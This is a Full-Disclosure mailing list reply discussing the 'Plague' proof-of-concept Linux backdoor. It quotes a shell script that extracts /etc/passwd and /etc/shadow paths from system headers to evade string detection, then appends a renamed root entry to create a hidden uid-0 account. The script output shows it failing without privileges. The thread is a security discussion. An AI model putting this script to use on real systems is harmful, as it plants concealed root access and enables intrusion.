[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Plague Proof of Concept Linux backdoor

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completly out of the subject and and the same time some of
which offensive to me!

Let's go into more detauls on that backdoor.

I created the file test1.sh containing:

hijacker@hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I chmod 700 test1.sh
then I run:

hijacker@hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied


Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov


> On 22 Oct 06, at 04:29, hijacker@xxxxxxxxx wrote:
>> even if they have ssh access, there is still nothing they can do,
>> except
>> to create two files in there $HOME directories containing
>> expressions from
>> paths.h and sysexits.h ?
>>
>> Why would that be considered a backdoor?
>
> The awk commands parse out the strings "/etc/passwd" and "/etc/
> shadow" from
> the headers. It's still rather easily detected - most of the rootkit-
> checking
> programs will detect an alternate uid0 account very quickly - but it
> does
> demonstrate an interesting way of avoiding target strings in the binary.
>
>
>
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/